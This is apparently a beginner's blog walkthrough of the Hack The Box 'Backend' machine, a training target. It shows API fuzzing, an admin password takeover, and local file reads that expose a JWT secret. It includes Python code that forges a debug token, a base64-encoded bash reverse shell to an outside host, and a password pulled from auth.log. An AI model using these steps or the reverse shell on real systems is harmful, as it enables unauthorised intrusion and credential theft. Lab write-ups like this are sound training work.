Hello guys, welcome to my blog. Today we are going to see a walkthrough (writeup) of the Backend Hack The Box machine, which was created by IppSec, and we are going to take the user flag and the root flag from the machine. Basically, this machine is based on API abuse, so let us get started.
ALERT:
THIS ARTICLE IS WRITTEN FOR BEGINNERS SOLVING THE MACHINE, SO WE AVOID HEAVY TECHNICAL TERMS SO THAT BOTH NON-TECHNICAL AND TECHNICAL READERS CAN FOLLOW. THANK YOU
About Machine:
This Backend machine is based on API abuse and enumeration. Through enumeration we are able to get admin access to the Swagger docs, a command injection vulnerability gives us a shell, and by analysing the auth.log file on the box we are able to get the root flag.
So first we start with an Nmap scan.
STEP 1: nmap -sC -sV 10.10.11.161
Analysing this Nmap report you can see two open ports, 22 (SSH) and 80 (HTTP), and in the HTTP banner you can see uvicorn, which is an interesting hint.
Uvicorn is an ASGI web server implementation for Python, so we are most likely looking at a Python API.
So when we look at the web page in the browser you can see JSON data.
Let us enumerate this web application using the feroxbuster tool.
STEP 2: feroxbuster -u http://10.10.11.161
Looking at this report, you can see two interesting directories, docs and api. The docs directory returns a 401 status code, which means not authenticated.
So let us look at the api directory, which returns a 200 status code.
Now you can see the v1 endpoint, so let us try this endpoint.
STEP 3: http://10.10.11.161/api/v1
Now you will get two endpoints, user and admin.
After trying these two endpoints you will get a "Not authenticated" JSON response.
So let us brute force the endpoints underneath them using feroxbuster or wfuzz.
In this scenario I am going to use wfuzz.
First, we are going to fuzz the user endpoint.
STEP 4: wfuzz -u http://10.10.11.161/api/v1/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
While fuzzing you will get a lot of 422 responses (the API rejects anything that is not a numeric ID), so let us hide them using --hc.
STEP 5: wfuzz -u http://10.10.11.161/api/v1/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 422
Now you can see a lot of numeric IDs, so let us try them one by one, and we are going to capture these requests in Burp Suite for further analysis.
First I have taken ID number 1, which is the admin ID, so let us capture this request in Burp.
While capturing this request nothing interesting shows up, so let us enumerate further with wfuzz by changing the method to POST.
STEP 6: wfuzz -u http://10.10.11.161/api/v1/user/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -X POST --hc 404,405
Now you can see two interesting endpoints, login and signup. Capture this request in Burp (and change the GET method to POST).
So next we are going to sign up on this website.
First capture the signup request.
Send this request to Repeater, change the GET method to POST and add the header Content-Type: application/json.
Next enter the email and password in the body (shown below) and send the request. It will give a response with status code 201, which means Created.
Next we are going to log in with the username and password using curl, because it is an easy way to get the authorization token. You can get it in Burp Suite as well, but I always prefer the easy way for beginners.
STEP 7: curl -X POST http://10.10.11.161/api/v1/user/login -d 'username=evil@htb1.in&password=evilox'
Now you can see the authorization token (a JWT) for that username and password, so let us use this token on the docs directory.
Before that, install the Simple Modify Headers browser add-on.
First go to the docs page.
Next open the Simple Modify Headers add-on and add the URL pattern http://10.10.11.161/*
Set the header field name to Authorization, set the header field value to the word Bearer, a space, and then the token, save it and click the Start button.
Now open Burp Suite and you can see the request going out with the header (check it for any errors).
Once the docs page opens, click the secret flag endpoint, click Try it out and click Execute.
You can see the user flag, which is user.txt.
Boom!
Root Flag
First we are going to check whether our role is admin or not using the admin check endpoint.
But the result is false, so now we are going to become admin using the guid.
First go to Fetch user, which is /api/v1/user/{user_id}/
Next, give the user_id, which is 1.
Now you can see the admin's guid in the response.
Copy that guid, paste it into the update password endpoint and enter any password to become admin. (Note the flaw here: the password update is authorised by the guid alone, and the guid is returned to any authenticated user who fetches the account.)
So now the admin password is updated.
Next we are going to authorize using the admin username and our new password.
Now you are authorized.
So now check whether we are admin or not.
Hooray! It shows true. Copy the authorization token.
Next we are going to run a command through /api/v1/admin/exec/{command}. I am going to capture this in Burp Suite because I am too lazy to scroll down and read the output in the docs page.
But it throws a 404 Not Found because the {command} path parameter does not accept symbols such as / and +, so anything with a path in it is routed nowhere.
So let us try a plain command such as whoami, ls or pwd.
But then it throws the error "Debug key missing from JWT".
So our next goal is to find the JWT debug key, and for that we use the get-file endpoint, /api/v1/admin/file.
I think this is affected by LFI (local file inclusion) because we can give it any Linux file path, so let us try it.
I have tried /etc/passwd...
It works! So let us check the environment of the web process, which is /proc/self/environ.
You will get the environment variables back. Copy the output and paste it into Sublime or Vim or anything; in this case I am going to use Sublime because it is beginner-friendly.
I have removed the \u0000 (null) separators between the variables.
Analysing this output I found one interesting directory, app, and the Python entry point main.py, so let us check it, because the application's modules are imported from there.
It is located at /home/htb/uhc/app/main.py
After analysing the file you can see two endpoint files, user and admin.
First we are going to check the admin file.
It is located at /home/htb/uhc/app/api/v1/endpoints/admin.py
Paste it into a text editor or Sublime.
Analysing this file I found deps.py (the dependencies module that validates the token), so let us check it.
Analysing that file I found the settings object, and I think the JWT secret key lives there.
The reason I went after this key is the debug-key error above: the debug claim is part of the signed token, so we need the signing secret to set it (note this).
And I found that the settings are imported from config.py.
So let us check the config file:
/home/htb/uhc/app/core/config.py
Now you can see the JWT secret key.
Woo!
Next we are going to use this secret key to re-sign the authorization token.
Open the jwt.io website and paste the admin authorization token.
Paste the secret key into the "verify signature" box; there is a random placeholder secret there already, please erase it first.
Next add "debug": true to the payload.
Copy the new token, go to /api/v1/admin/exec/{command} and execute a command.
Initially we got the debug-key error.
So now erase the old authorization token and paste the new one.
Now you get a 200 OK response (the error is gone) and the command output comes back.
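What jwt.io is doing by hand above, as an added example (this is not code from the original post or from the machine): decode the two base64url parts of the admin token, add "debug": true, and re-sign with HMAC-SHA256 using the key from config.py. The secret below is a placeholder for the value read from config.py, not the machine's real key, and the claim names in the constructed admin token are illustrative. It also shows the check the server performs, so you can confirm a forged token verifies before sending it.

```python
import base64
import hashlib
import hmac
import json

# Placeholder for the value this example assumes was read from config.py;
# it is NOT the machine's real key.
ASSUMED_SECRET = "example-secret-from-config-py"


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; restores the padding the token strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two parts."""
    def enc(obj: dict) -> str:
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc(header)}.{enc(payload)}"
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_unverified(token: str):
    """Return (header, payload) without checking the signature: what jwt.io displays."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str) -> bool:
    """True only if the signature was produced with this secret (constant-time compare)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def forge_debug_token(token: str, secret: str) -> str:
    """Re-issue a token with "debug": true, the step done by hand on jwt.io above."""
    header, payload = decode_unverified(token)
    if header.get("alg") != "HS256":
        raise ValueError("this example only handles HS256 tokens")
    payload["debug"] = True
    return sign_hs256(header, payload, secret)


# Constructed stand-in for the admin token copied from the docs page; the claim
# names are illustrative, not a dump of the machine's token.
ADMIN_TOKEN = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"sub": "1", "is_superuser": True, "exp": 2000000000},
    ASSUMED_SECRET,
)

if __name__ == "__main__":
    forged = forge_debug_token(ADMIN_TOKEN, ASSUMED_SECRET)
    print(decode_unverified(forged)[1])
    print("verifies with the assumed secret:", verify_hs256(forged, ASSUMED_SECRET))
```

If verify_hs256 returns False for the forged token, the secret you pulled out of config.py is wrong (or the token is not HS256), which is the same situation as the "Debug key missing from JWT" error: the server only trusts the debug claim when the signature checks out.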
Now we are going to get a reverse shell. Because the exec endpoint rejects / and +, we encode the shell one-liner with base64.
STEP 8: echo "bash -i >& /dev/tcp/10.10.11.xx/3333 0>&1" | base64
Now you have the base64-encoded payload.
Paste it into the request in Burp Suite.
If you send it as-is it will not work, so select the command and URL-encode all characters.
Before that, start the listener with netcat on the port you chose.
After sending the request you will get the shell in netcat.
Now we are going to spawn a proper /bin/bash.
STEP 9: python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to put the shell in the background.
STEP 10: stty raw -echo; fg
Enumerating the machine further, I found something interesting in auth.log.
STEP 11: cat auth.log
Now you can see a password in the log: someone typed it into the username field of a login, so it ended up recorded in the failed-login entries in clear text.
Type su; when it asks for the password, enter that password and you will get a root shell.
Boom!
Now you get the root flag, which is root.txt.
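An added example of the auth.log check above (not from the original post): pull the "invalid user" names out of sshd entries and flag the ones that do not look like a Unix username, which is where a password typed into the wrong field ends up. The log lines and the password-like string are constructed for the example and are not the machine's real log or credentials.

```python
import re

# Constructed sample in the format sshd and su write to auth.log; not real data.
SAMPLE_AUTH_LOG = """\
Mar 22 09:14:01 backend sshd[1022]: Invalid user admin from 10.10.14.5 port 50222
Mar 22 09:14:01 backend sshd[1022]: Failed password for invalid user admin from 10.10.14.5 port 50222 ssh2
Mar 22 09:16:40 backend sshd[1031]: Invalid user S3cr3t-Exampl3! from 10.10.14.5 port 50230
Mar 22 09:16:40 backend sshd[1031]: Failed password for invalid user S3cr3t-Exampl3! from 10.10.14.5 port 50230 ssh2
Mar 22 09:17:05 backend sshd[1040]: Accepted password for htb from 10.10.14.5 port 50240 ssh2
Mar 22 09:20:11 backend su: FAILED su for root by htb
"""

# Matches both the "Invalid user X" and "Failed password for invalid user X" forms.
INVALID_USER = re.compile(
    r"(?:Invalid user|Failed password for invalid user) (?P<user>.+?) from (?P<src>\S+)"
)

# POSIX-style username: lowercase start, then lowercase/digits/'_'/'-', max 32 chars.
USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def invalid_usernames(log_text: str) -> dict:
    """Map each rejected username to the set of source IPs that tried it."""
    seen = {}
    for line in log_text.splitlines():
        m = INVALID_USER.search(line)
        if m:
            seen.setdefault(m.group("user"), set()).add(m.group("src"))
    return seen


def looks_like_password(candidate: str) -> bool:
    """Heuristic: anything that is not a plausible username was probably a password."""
    return USERNAME.fullmatch(candidate) is None


def leaked_password_candidates(log_text: str) -> list:
    """Rejected 'usernames' that look like mistyped passwords, sorted."""
    return sorted(u for u in invalid_usernames(log_text) if looks_like_password(u))


if __name__ == "__main__":
    for user, sources in invalid_usernames(SAMPLE_AUTH_LOG).items():
        tag = "PASSWORD?" if looks_like_password(user) else "username"
        print(f"{tag:10} {user!r} from {', '.join(sorted(sources))}")
```

On a real box you would feed it the contents of /var/log/auth.log (the file the post reads with cat). The same heuristic is useful from the defender's side: a "username" in a failed-login record that contains uppercase letters or punctuation is a credential leak worth rotating, not just noise.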
I hope you liked this article. If you did, please subscribe, and if you like my work, consider donating towards my OSCP exam.